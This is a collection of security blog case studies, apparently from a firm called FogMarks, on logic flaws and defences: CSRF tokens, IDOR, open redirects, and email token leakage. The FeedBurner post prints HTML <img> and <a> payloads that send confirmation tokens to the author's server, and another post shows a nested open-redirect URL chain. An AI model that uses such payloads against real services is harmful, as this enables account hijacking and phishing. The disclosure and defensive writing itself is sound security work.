When The Blind Can See

Hi there! Long time no see!
One of the reasons for our blackout, besides tones of vacations and hours of playing Far Cry on the XBOX, was that we have been very busy exploring new grounds in the web & application research. Today we are excited to show you one of those new areas.

We’ll go straight to the point: Our research in the past couple of months did not focused on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new. We wanted to focus on something exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have exciting definitions. I mean, those are types of vulnerabilities that have yet to be discovered, or at least yet to be released.
Today’s case-study is exactly one of those exciting new findings.

This time, the research was not a company-specific. It was a protocol-specific.
What are you talking about?
Its simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are being done in the top-used communication protocols.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol.

In short, the SMTP protocol is being widely used by millions of web applications to send email messages to the client. This protocol is very convenient and easy to use, and many companies have implemented it in their everyday use: swap messages between employees, communicate with customers (notifications, etc.) and many more. But the most common use right now for SMTP (or simply for ‘sending mail’) is to verify users accounts.

One of SMTP features is the fact that it allows sending stylish, pretty HTML messages. Remember that fact.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email is indeed being used by the client. This email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)

“SMTP allows sending HTML, so lets send XSSs to users and party hard” – Not really. Although HTML is being supported by SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML arrived in the SMTP, before parsing it and executing it to the viewer.

And that’s where I started to think: How can I hijack the verification link that users receive to their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I can include a sanitized, non-malicious HTML code, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)”>Click here!!!</a>

And it worked. The users received an email with a non-malicious HTML code. When they clicked it, the confirmation link was being logged in a server of mine.

I though: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event? Well, the answer is incredible. I’ll use the one allowed tag that is being loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)” />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML’s automatic image loading mechanism, and abused the fact the sanitized HTML could be sent over SMTP.

Google hasn’t accepted this submission. They said, and they are totally right, that the SMTP mail is being sent by FeedBurner with a content type: text/plain header, and therefore, it is the email provider’s fault that it is ignores this flag and still parses the HTML, although it is being told not to.

But still, this case-study was presented to you in order to see how everyday, “innocent & totally safe” features can be used to cause great harm.

Tokening The Tokens!

Spring is here!

Hope you guys enjoyed the last days of the winter, because this summer is going to be hot. And I don’t mean the temperature. More details about that later…

Our case-study today set some ground rules for a new Anti-CSRF attitude that I was working on for the past few months. This new attitude, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don’t freak out! You’ll understand that in no time.

First, I must say that I am probably not the first one to think of this attitude. During some researches I came across the same principals of the tokens cataloging method I am about to show you.

So, What the hell is tokens cataloging you ask? It’s simple. This is an Anti-CSRF security attitude (/policy/agreement/arrangement – call it what you want) where CSRF tokens are being separated to different actions categories. This means that there will be a certain token type for input actions, such as editing a certain field or inserting new data, and there will be a different type of tokens for output actions, such as fetching sensitive information from the server, or requesting a certain private resource. These two main token groups will now lead our way to security perfectness. Whenever a user will be supplied with a form to fill, he will also be supplied with an input action token – a one-time, about-to-expire token which will only be valid to this specific session user, and will expire x minutes after its creation time. This input token will then be related to this specific form tokens family, and will only be valid in actions of this family-type.

Now, after explaining the “hard, upper layer”, let’s get down with some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new attitude separates the tokens to different families, we also use different types of tokens – some tokens should only be integers (long, of course), some should only be characters, and some should be both. When there is no need to save the token for further action, the token should not be kept in a certain data collection, and it should be generated specifically for each user.
What does it mean? That we can derive tokens from the session user’s details which we already have – we can use his session cookie, we can use his username (obfuscated, of course) and we can mix some factors in order to generate the token in a unique way, which can only be ‘understood’ by our own logic later in the token validation process. No more creating a random 32-chars long token with no meaning that could be used trillion times. Each action should have its own unique token.

“This is so frustrating and unnecessary, why should I do it?”
If you don’t care about resubmitting of forms, that’s OK. But what about anti brute forcing, or even anti-DoSing? Remember that each action that inserts or fetches data from the DB costs you in space and resources. If you don’t have the right anti brute forcing or anti DoSing mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this attitude costs you too much, simply implement some of the ideas the were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don’t want to generate a token for each user’s unique action, at least generate a token for each user’s “general” action, like output and input actions.

Once Upon A Bit

Today’s case-study is pretty short – you are going to get its intention in a matter of seconds.
We are going to talk about observation, and about the slight difference between a no-bug to a major security issue.

Every security research requires respectful amounts of attention and distinction. That’s why there are no successful industrial automatic security testers (excluding XSS testers) – because machines cannot determine all kinds of security risks. As a matter of fact, machines cannot feel danger or detect it. There is no one way for a security research to be conducted against a certain targets. The research parameters are different and varies from the target. Some researches end after a few years, some researches end after a few days and some researches end after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (to the attacker), that no further research was needed in order to get to the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozens of industrial companies and  start-ups, asked us to test its’ “database” resistance. Our goal was to leak the names of the clients from a certain type of collection – not SQL-driven one (we still haven’t got the company’s approval to publish it’s name or the type of vulnerable data collection).

So, after a few minutes of examining the queries which provide information from the data collection, I understood that the name of the data row is a must in order to do a certain action about it. If the query-issuer (=the user who asks the information about the row) has permissions to see the results of the query – a 200 OK response is being returned. If he doesn’t – again – a 200 OK response is being returned.

At first I thought that this is a correct behavior. Whether the information exists in the data collection or not – the same response is being returned.
BUT THEN, Completely by mistake, I opened the response to the non existent data row in the notepad.

The end of the 200 OK response contained an unfamiliar, UTF-8 char – one that shouldn’t be there. The length of the response from the non existent data row request was longer in 1 bit!

At first, I was confused. Why does the response to a non-existent resource contains a weird character at the end of it?
I was sure that there is a JS code which checks the response, and concludes according to that weird char – but there wasn’t.

This was one of the cases where I cannot fully explain the cause of the vulnerability, because of a simple reason – I don’t see the code behind.

The company’s response, besides total shock to the our fast response, was that “apparently, when a non-existent resource is being requested from the server, a certain sub-process which searches for this resource in the data collection fires-up and encounters a memory leak. The result of the process, by rule, should be an empty string, but when the memory leak happens, the result is a strange character. The same one which is being added to the end of the response.

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes this is more convenient and it can save a lot of time, but whenever you are using another process – you cannot fully predict its results. Remember – it can crush, freeze, force-closed by the OS or by some other process (anti-virus?).
If you must use a thread or sub-process, at least do it responsibly – make sure the OS memory isn’t full, the arguments that you pass to the process, the process’s permission to run and its possible result scenarios. Don’t ever allow the process to run or execute critical commands basing on user input information.

Knocking the IDOR

Are you following FogMarks?

Hello to you all.

Sorry for the no-new-posts-November, FogMarks has been very busy experiencing new fields and worlds. But now – we’re on baby!

Today’s case-study is on an old case (and by old I mean 3 months old), but due to recent developments in an active research of a very known company’s very known product, I would like to present and explain the huge importance of an Anti-IDOR mechanism. Don’t afraid, we’re not biting.

Introduction

Basically, an IDOR (Insecure Direct Object Reference) allows attacker to mess around with an object that does not belong to him. This could be the private credentials of users, like the email address, private object that the attacker should not have access to, like a private event, or public information that should simply, and rationally – not be changed by a 3rd person, like a title of a user (don’t worry – case-study about the Mozilla vulnerability is on its way).

When an attacker is able to mess around with an object that does not belongs to him, the consequences might be devastating. I am not talking just about critical information disclosure that could lead the business to the ground, I am talking about messing around with objects that could lead the attacker to execute code on the server. Don’t be so shocked – it is very much possible.

From IDOR to RCE

I’m not going to disclosed the name of the company or software that this serious vulnerability was found on. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall.
But I am going to tell you how an IDOR became an RCE on the server, without violent graphic content of course. For Christ’s sake, children might be reading these lines!

Ideally speaking,
An IDOR is being prevented using an Anti-IDOR Mechanism (AIM). Us at FogMarks have developed one a few years ago, and, know-on-wood, none of our customers ever dealt with an IDOR problem. Don’t worry, we’re not going to offer you to buy it. This mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info below, jeez!
But seriously, AIM’s main goal is to AIM the usage of a certain object only to the user who created it, or have access to it.

This is being done by holding a database table especially for sensitive objects that could be targeted from the web clients.
When an object is being inserted to the table, the mechanism generates to it a special 32 chars long identifier. This identifier is only being used by the server, and it is calld SUID (Server Used ID). In addition, the mechanism issues a 15 chars long integer identifier for the client side that is called, of course, CUID (Client Used ID). The CUID integer is being made from part of the 32 chars long SUID and part of the object permanent details (like name-if name cannot be changed afterwards) using a special algorithm.

In the users’ permissions table there is also a row of list of nodes that contains the SUID of objects that the user has access to it.

When the user issues a request from the client side (from the JS – a simple HTTP request (POST/GET/OPTIONS/DELETE/PUT…), the CUID is being matched with the SUID – the algorithm tries to generate the SUID from the supplied CUID. If it succeed, it then tries to match the generated SUID the SUIDs list in the users’ permission table. If it match, the requesting user gets one time, limited access to the object. This one time access is being enabled for x minutes and for one static IP, until the next process of matching CUID to SUID.

All this process, of course, is being managed by only one mechanism – The AIM. AIM handles request in a queue form, so when dealing with multiple hundreds of requests – AIM might not be the perfect solution (due to possible object changes by 2 different users).

In conclusion, in order to keep your platform cure from IDORs, requests to access sensitive objects should be managed only by one mechanism. You don’t have to do the exact logic like we did and to compile two different identifiers to the same object, but if you’ll like to prevent IDORs from the first moment (simply spoofing the ID), our proposed solution is for the best.

Here are some more examples of IDORs found by FogMarks in some very popular companies (and were patched, of course):

Jumping Over The Fence

Are you following FogMarks?

“Fences were made to be jumped over” – John Doe

As you might have already guessed (or not), today’s case-study is about an open redirects.

I have already shared with you my thoughts about open redirects and their consequences on the website’s general security.
Now it is the time to demonstrate how open redirects can be achieved by manipulating the AOR (Anti Open Redirects) mechanism.

A great example for a great AOR is again Facebook’s linkshim system. It is basically attach an access token to every URL that is being posted on Facebook.
That access token is personal, so only the user who now viewing the link can be the one to click on it and be redirected to its destination; other don’t. In addition, the linkshim mechanism checks the destination for the user and prevents the user from being redirected to a malicious website. Yes, pretty cool.

Well, until now the sun is shining and we all are having fun at the beach. Hang me that beer, would you?
But what happens when the AOR mechanism, the same one that we trust so much, is being manipulated to act differently?
That’s exactly what we are going to witness today.

Sadly, most websites that use an AOR manage the links that are being posted to them only if those links are of 3rd party websites. Which means, that if I am on the website x.com and I am posting a link to website y.com, the link will appear this way on x.com: x.com/out?url=y.com&access_token=1asd2ad6fdC

But if I’ll post a link to the same domain (post x.com/blabla on x.com), the link will appear as is: x.com/blabla

The reason this is happening is because websites trust themselves to redirect user within them. They think this is ‘safe’ and ‘pointless’ to attach an access token to a link that is redirecting the user to the same domain. And you can agree with them, like many. I heard the argument ‘if a certain page is vulnerable to an open redirect there is no reason to check redirection to it‘ countless times. But now I’m about to change that once and for all.

A very popular designs website, which I can’t reveal his name because there are a few more vulnerability checks to perform on it had this exact vulnerability.

The site allowed “inner links” to be redirected with any access token or validation, but required the referrer to be the same domain. Pretty smart. But the AOR mechanism allowed any inner link to be redirected,  as long as its domain was that site’s main domain.

Using a domain enumeration software I was able to detect a sub domain of the website that contained a mail service for the company’s employees, and that mail service had an open redirect vulnerability on its logout page – even the user was not logged in, when the log out page was being accessed with a ‘redirect after’ GET parameter, the user was redirected to any other page, even of a 3rd party web.

Now that I have an open redirect on a sub domain page, how can I make it rain from the main domain?

Well, the answer was quite easy – I’ll simply use the logic flaw of the AOR mechanism to redirect the user to the sub domain and from there to the 3rd party site.

But there was still a problem – as I said before, the AOR mechanism allowed the link to be redirected to a subdomain, but only if the referrer was the same website. So what have I done?

I have simply redirected the user to the same page, and then he got redirected again.

Example:
If the 2 vulnerable pages are:
Vulnerable mail service: http://mail.x.com/out?url=y.com
‘Vulnerable’ page within the domain: http://x.com/redirect?to=mail.x.com/out?url=y.com

And the second page requires the referrer header to be from x.com, I have simply issued the following URL:

http://x.com/redirect?to=x.com/redirect?to=mail.x.com/out?url=y.com

That’s it. A beautiful example of a simple, easy-to-use logic flaw withing an AOR mechanism.

target

Private Element Gone Public

Are you following FogMarks?

In what way you interact with “private” elements of your users? I mean elements like their name, email address, home address, phone number or any other kind of information that may be important to them.

Today’s case-study talks just about that. We will talk about the way private elements (and I’ll explain the term ‘elements’ later) should be handled, and then we will see 2 neat examples from vulnerabilities I have found on Facebook (and were fixed, of course).

OK, so you are mature enough to ask your users to trust you with their email address, home address and phone number. If you are smart, you’ll know that this type of information should be transmitted on the wire via HTTPS, but you’ll remember that sometimes it is a good practice to encrypt by yourself.

But now that the users info are properly saved, and your system is immune to SQL injections, I would like to introduce you to your next enemy: IDOR.

Insecure Direct Object References are your info’s second-worst enemy (after SQLi, of course). Attacker who is able to access other users private elements (such as email address, phone number, etc) basically could expose all of the private data from the server.

This is the time to explain my definition to private elements. User elements are not just the user’s phone number, email address, name, gender, sexual-orientation or favorite side of the bed. They are also elements that the user’s creates or own, like the items in the user’s cart, a group that the user owns or a paint that a user makes.

The best way to handle private elements is to define them as private and treat them with the needed honor.

If you know that only a certain user (or users) should be able to access a certain element, make sure that only those users IDs (or other identifier) are able to access and fetch the element.

How will you do so? Using a private elements manager of course.
The idea is simple: A one class that is fetching information about private events only if an accepted identifier is being provided (for example, a class that will return the email address of the user ID ‘212’ only if the ID of the user who requested that information is ‘212’.

By sticking to this logic you’ll enforce a strong policy that will make all of the APIs to interact the same way with the private elements.

Now, our good friends at Facebook apparently forgot to change their logic on their old mbasic site (mbasic.facebook.com).

I have found 2 vulnerabilities which allowed the name of a private (secret) group or event to be disclosed to any user, regardless the fact that he is not invited or in the group/event. The first vulnerability is here by presented, but the second one is yet to be fully patched (it is in progress these days):

And The King Goes Down


Tokens are great. Well, sometimes.

Today’s case-study will discuss the importance of a Token Manager software.
Well, every site which allows login normally will use a token on each of the ‘critical’ actions it allows users to do. Facebook, for example, automatically adds a token at the end of any link a user provide, and even their own links! This mechanism is called ‘Linkshim’ and it is the primary reason why you never hear about Facebook open redirects, CSRFs or clickjacking (yeah yeah I know they simply not allowing iframes to access them, I’ll write a whole case-study about that in the near future).
Facebook’s method is pretty simple – if a link is being added to the page – add a token at the end of it. The token, of course, should allow only for the same logged-in user to access the URL, and there should be a token count to restrict the number of times a token should be used (hint- only once).

But what happens when tokens are being managed in a wrong approach?

A very famous security company, which still hasn’t allowed us to publish it’s name, allowed users to create a team. When a user creates a team, he is the owner of the team – he has the ‘highest’ role, and he basically controls the whole team actions and options – he can change the team’s name, invite new people to the team, change roles of people in the team and so on.

The team offers the following roles: Owner, Administrator and some other minor non-important roles. Only the owner and administrators of the team are able to invite new users to the team. An invitation can be sent only to person who is not on the team and does not have an account on the company’s web. When the receiver will open the mail he will be redirected to a registration page of the company, and then will be added to the team with the role the Owner/Admin set.

When I first looked at the team options I noticed that after the owner or an admin invites other people to the team via email, he can resend the invitation in case the invited user missed it or deleted it by accident. The resend options was a link at the side of each invitation. Clicking the link created a POST request to a certain ‘Invitation manager’ page, and passed it the invitation ID.

That’s where I started thinking. Why passing the invitation ID as is? Why not obfuscate it or at least use a token for some sort of validation?

Well, that’s where the gold is, baby. Past invitation IDs were not deleted. That means that invitations that were approved were still present on the database, and still accessible.

By changing the passed invitation ID parameter to the ‘first’ invitation ID of the Owner – It was possible to resend an invitation to him.
At first I laughed and said ‘Oh well, how much damage could it make besides spam the owner a bit?’. But I was wrong. Very wrong.

When the system detected that an invitation to the owner was sent, it removed the owner from his role. But further more – remember that I said that sending an invitation sends the receiver a registration page according to his email address? The system also wiped the owner’s account – his private details, and most important – his credentials. This caused the whole account of the owner to be blocked. A classic DoS.

So how can we prevent unwanted actions to be performed on our server? That’s kind of easy.
First, lets attach an authenticity token to each action. The authenticity token must be generated specifically and individually to each specific user.
Second, like milk and cheese – lets attach an expiration date for the token. 2 Minutes expiration date is the fair time to allow our token to be used by the user.
And last, lets delete used tokens from the accessible tokens mechanism. A token should be used only once. If a user has got a problem with that – generate a few tokens for him.

For conclusion,
This case-study presented a severe security issue that was discovered in the code of some very famous security company.
The security issue could have been prevented by following three simple principals – 1) Attaching a token to each action that is being performed by a user. 2) Setting a rational extirpation time for each token. 3) And most importantly – correctly managing the tokens and deleting used ones.

Should We Blame The Diet Coke Smuggler?


Everyone use user-controlled parameters. This is, as far as I concerned, the easiest way to create an effective http negotiation process. It means that in order to ease the interaction process between the site and the user, the site allows the user to tell him about essentials parameters that are needed for the next interaction. Even while this post is being written, after I’ll click ‘Publish’ a lot of POST parameters will be sent to the server and will be processed.

As you might have already guessed, today’s case-study will highlight the huge disadvantage of allowing users to ‘tell you what to do’.

Basically, I don’t believe in POST or GET. I know its sound funny or stupid, but when I see that so many security breaches were launched using a GET or a POST requests, I cannot live with that comfortably. I know that GET and POST are ‘just the messenger’ and it will be like blaming an innocent person who was used to smuggle diet Coke into a movie theater.

But I think that we all forgot one important thing – GET and POST are not alone. HTTP, especially on its latest version (and the next version) supports other request types. Like what? PUT, DELETE, OPTIONS. Those requests were made for a reason, and almost none of the latest players on the dev market are using them. Why? Because its not easy, and its not ‘widely used’. That idiotic term I heard a few days ago on a developer conference I participated. People kept explaining that a certain technology should not be used because “it is not widely used, and therefore there is not enough support or security research and maintenance”. And again – why exactly shouldn’t I use a unique software that no one else does? Why should I count on our security community to alert me whenever a software I’m using is breached?

As for HTTP requests, GET and POST are what I call ‘deprecated’. Too much companies and too much software use GET and POST requests with dozens of parameters to ‘get things done’. This is exactly the reason why XSSes vulnerabilities, along with IDORs and CSRFs, are being successfully executed – Websites use too much parameters and the developers, at some point, aren’t able to track the software’s behavior under certain conditions – from a general use by a client to an aggressive security research by professionals. That’s just the way it is. Another reason for security breaches is that websites count that the user will return them the parameters they expect, and if the user returns only a few parameters, some server side actions that are being executed by the missing parameters are not being executed, resulting in a security vulnerability.

Now, should we cry and bury GET and POST? No, of course that there is a way to keep using GET and POST and still be safe. All you have to do is to not blame the diet Coke smuggler, and to follow these 5 rules:

  1. Minimize the number of parameters that are being used. More parameters = more security breaches possibilities.
  2. Know exactly the purpose of each parameter.
  3. Know exactly what type of data each parameter should hold.
  4. Know what happens when each parameter is given the wrong type of data, or is MIA.
  5. And the most important thing – use all of the parameters! I can’t count the number of times a security breach was successfully launched because of a lack of using all the parameters. In fact, I’m writing these days another case-study about a Facebook security vulnerability just about that.

As for a finish, I’ll just drop this tiny note: FogMarks is looking nowdays for some new challenges. If you think you can interest us with something, simply DM us on Twitter (and make sure your’e following us) or send us an email on contact@fogmarks.com.

Open Redirects – Ups and Downs


A few years ago, when FogMarks was not even a tiny idea or a vision in my head, I used to do casual programming jobs on Fiverr.

One of the jobs/gigs(?) I was asked to do is to cause a user in site x.com to be redirected to Facebook.com and then, without an action from his side, to be redirected to a y.com site. I didn’t realize back then why would someone want the kind of thing. Why not simple redirecting the user directly to y.com?
I asked the person why would he want to do such a thing. His answer changed the way I (and after that, FogMarks,) treated and took care of Open Redirects.  He answered that by forcing a user come from a Facebook URL, the ads engines on y.com are paying much, much more, because a popular site like Facebook is redirecting users to y.com.

Until this answer I treated open redirects as simple security issues, that can’t hurt that much. I know that innocent user can get a link of the type: innocent.com?redirect_out=bad.com, but I believed that anyone with a little common sense will see such things going on. Those kind of attacks are mostly being used by Phishing web sites, to try and simulate the domain of innocent.com.

After this long introduction, I want to introduce today’s topic – the solution to open redirects. Facebook did it in their Linkshim system, but I want to introduce a much simpler solution that any of you can use.

Quick Note: Who should not adopt this solution? Websites who want their domain to be present on the Referrer header.

Well, the regular ways I have seen to prevent open redirects are creating a token (YouTube, Facebook’s l.php page), forbidding URLs that don’t not contain the host of the website and allowing a user to be redirected only from a POST request.

While creating an exit token is a good practice, handling and taking care of this whole system is pretty much of a headache. You have more values to store at the DB, you should check for expiration times, IP address and a lot more.

Forbidding URLs that don’t not contain the host of the website is simply wrong. Websites should allow other users to be redirected to another websites, not only pages within themselves.

And allowing user to be redirected only after he clicks on a button, for example, isn’t always that convenient – to you or to the user.

The Golden Solution
Honestly, the first thing you’ll about to say is: “What? This guys is crazy”. But the next thing will be: “Okay, I should give that a try”.
Well, a lot of websites today offers a free URL shortening services. In addition to that – they offer a free modular & convenient API.
Why don’t use them?!

Instead of carefully creating an exit token, forbidding outside redirects or requiring POST, simply translate any outside URL to a shortened URL that a certain service provides. If you don’t want third party services to store your information, you build one of your’e own using an open source system.

That way – you won’t have to worry about open redirects – they won’t be occur from your domain.

Lets say you have a page called ‘redirect_out.php’ with an r GET parameter that a user can supply:

my.com/redirect_out.php?r=http://bad.com

Accept the bad.com URL from the user, automatically translate it to a shorte.nd/XxXxX URL and then allow redirection.

Extra: Benefits of using a well known shortening service
As mentioned before, this solution is offered only to developer who don’t want their domain to be shown up as the referrer. If your worried about phising attacks, its a different scenario. Although by using a well known shortening service which manages a black list of known “bad domains” you’ll earn twice:

  • Your’e domain will not be the one who redirected users to ‘bad’ websites (yes, Google knows and checks that too)
  • You’ll increase the phishing protection level of your web. Your users will be able to be redirected to ‘bad’ web sites, but the shortening service will deny it, or at least warn those users (and potentially you).

 

How Private Is Your Private Email Address?


After reading some blog posts about Mozilla’s Addons websites, I was fascinated from this python-based platform and decided to focus on it.
The XSS vector led basically to nowhere. The folks at Mozilla did excellent job curing and properly sanitizing every user input.

This led me to change my direction and search for the most fun vulnerabilities – logic flaws.

The logic flaws logic
Most people don’t know, but the fastest way to track logic issues is to see things logically. That’s it. Look at a JS function – would you write the same code? What would you have changed? Why?

Mozilla’s Addons site has a collections feature, where users can create a custom collection of their favorite addons. That’s pretty cool, since users can invite other users to a role on their collection. How, do you ask? By email address of course!

A user types in the email address of another user, an ajax request is being made to an ‘address resolver’ and the ID of the user who owns this email address returns.

When the user press ‘Save Changes’, the just-arrived ID is being passed to the server and the being translated again to the email address, next to the user’s username. Pretty wierd.

So, If the logic, for some reason, is to translate an email to an ID and then the ID to the email, we can simply interrupt this process in the middle of it, and replace the generated ID with the ID of another user.

The following video presents a proof of concept of this vulnerability, that exposed the email address of any of addons.mozilla.org users.

Final Thoughts
It is a bad practice to do the same operation twice. If you need something to be fetched from the server, fetch it one time and store it locally (HTML5 localStorage, cookie, etc.). This simple logic flaw jeopardized hundreds of thousands of users until it was patched by Mozilla.

The patch, as you guessed, was to send the email address to the server, instead of sending the ID.